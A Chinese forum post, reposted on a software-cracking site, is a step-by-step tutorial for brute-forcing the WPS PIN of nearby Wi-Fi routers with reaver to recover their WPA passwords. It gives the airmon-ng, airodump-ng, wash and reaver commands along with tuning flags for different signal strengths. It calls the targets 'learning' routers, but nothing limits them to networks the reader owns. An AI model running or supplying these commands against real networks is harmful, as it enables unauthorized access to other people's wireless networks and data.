找回密码
 立即注册

QQ登录

只需一步,快速开始

1401软件论坛总版规【新人必看】如何正确发布收费帖子加入vip系统学习仅需498元免费获得1401软件安全论坛vip开通本站VIP会员请联系QQ 564853771
论坛纪念优盘Beyond EXE超强加密器V1.61401论坛破解工具包 2017-9-12[破解班vip]入门篇[破解班vip]基础篇
[破解班vip]脱壳篇[破解班vip]实战篇[破解班vip]网络验证篇[破解班vip]零基础HOOK教程[破解班vip]零基础易语言入门
[破解班vip]零基础c语言入门[破解班vip]零基础Delphi编程入门[破解班vip]寒假培训课程共7课[破解班vip]破解提高篇[破解班vip]易语言培训课程
[破解班vip]核心技术培训篇[破解班vip]pe格式与pe操作[破解班vip]2022全新封包-山寨-爆破全系列[原创课程]c++单文档框架课程[逆向班vip]汇编语句与反汇编基础
[逆向班vip]全自动扫雷辅助[逆向班vip]手机模拟按键[逆向班vip]植物大战僵尸辅助广告位招租...付费破解软件 +Q 564853771
查看: 3907|回复: 1

【PIN法之reaver深度解析】

[复制链接]
  • TA的每日心情
    开心
    2016-12-31 19:24
  • 签到天数: 148 天

    [LV.7]常住居民III

    335

    主题

    380

    回帖

    1693

    积分

    版主

    【KingSolomon】

    UID
    972
    元宝
    340
    威望
    458
    贡献
    19
    信誉值
    0
    精华
    17
    在线时间
    179 小时
    注册时间
    2014-5-16
    最后登录
    2017-1-4
    违规
    0
    积分
    1693

    最佳新人活跃会员热心会员灌水之王论坛元老吾爱富翁工具大师已有小成

    QQ
    发表于 2014-6-3 01:28:26 | 显示全部楼层 |阅读模式
    Ȧ
    特别声明:本帖为转载分享帖,非本人原创,只因为之前出的帖子网友对reaver命令以及对方无线AP是否可pin存在疑问,故借用此贴予以说明!


    PIN码
    破解简单解释:
        PIN码分前4和后4,先破前4只有最多一万个组合,破后4中的前3只有一千个组
    合,一共就是一万一千个密码组合。 10的4次方+10的3次方=11000个密码组合。
        当reaver确定前4位PIN密码后,其任务进度数值将直接跳跃至90.9%以上,也就是
    说只剩余一千个密码组合了。总共一万一千个密码!
    学习过程
    1.在虚拟机找到点击打开。如果电脑装有多个无线网卡,请先发指令
    ifconfig -a   确认你用哪一个网卡WLAN0或是WLAN1
    (下面的指令都是以单一网卡WLAN0为例)
    2.出现root Shell窗口。敲入第一条命令“ifconfig wlan0 up” 加载
    usb网卡。

    接下来“airmon-ng start wlan0” 监听模式已激活到了
    mon0。

    如果出现网卡没有正确加载,8187驱动RF-kill的参考后记1解决问题。
    3.第二条命令“airodump-ng mon0” 查看周边路由
    /AP的信息。
    记录下你要学习的路由MAC地址。提供几个查看可以使用PIN码学习路由的方法。
    特别提示:只有AP开启了WPS、QSS功能,才可以用PIN法学习PSK密码!如何查看
    AP是否开了WPS、QSS呢提供几个小方法?
    a) reaver1.3下使用使用命令walsh -imon0-C 查看针对xiaopangOS3.2版本
    b) reaver1.4下用新的指令:WASH -i mon0 -C  C是大写在wps locked一项中有显示的。
    c) WIN7下,用通常的方式连接AP,如果在提示输入密码框下面,出现“通过按路由器
    按钮也可以连接”,就确认此AP开了WPS、QSS。
    d) 在螃蟹软件中——可用网络——模式下带N,G的这个不是很准
    最准确的是下面这个选项
    点击PIN输入配置,选择接入点,哈哈出来了吧,这里面都是可以学习的目标
    需要注意的是,查看后面有的是不支持pin码连接的,这样的就别弄了,后果你知道。
            
    1. 重新开启一个root Shell窗口,第三条命令“reaver -i mon0 -b MAC -a -S -vv” 抓PIN
    码。注意,MAC中冒号不可省略,MAC地址的字母大小写均可,-S是大写字母, -vv
    是两个V不是W!# _) }
    -i 监听后接口名称
    -b 目标mac地
         
    -a 自动检测目标AP最佳配
    -S 使用最小的DH key(可以提高破解速度)  
    -vv 显示更多的非严重警告
    -d 即delay每穷举一次的闲置时间 预设为1秒
    -t 即timeout每次穷举等待反馈的最长时间
    -c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9参数防止路由僵死
    reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
    小结-学习时应因状况调整参数(-c后面都已目标频道为1作为例子
    目标信号非常好:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d0  -c 1
    目标信号普通:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d2  -t .5  -c 1
    目标信号一般:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d5  -c 1

    学习开始了,然后就是漫长的等待。
      
    如果信号好的话2-4小时内进度走到100%你就会有惊喜发现。
    游客,如果您要查看本帖隐藏内容请回复

    本帖被以下淘专辑推荐:

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|Archiver|手机版|小黑屋|1401软件安全 ( ICP备16034480号 )

    GMT+8, 2024-11-24 11:09 , Processed in 0.140253 second(s), 29 queries , Gzip On.

    Powered by Discuz! X3.5

    Copyright © 2001-2020, Tencent Cloud.

    快速回复 返回顶部 返回列表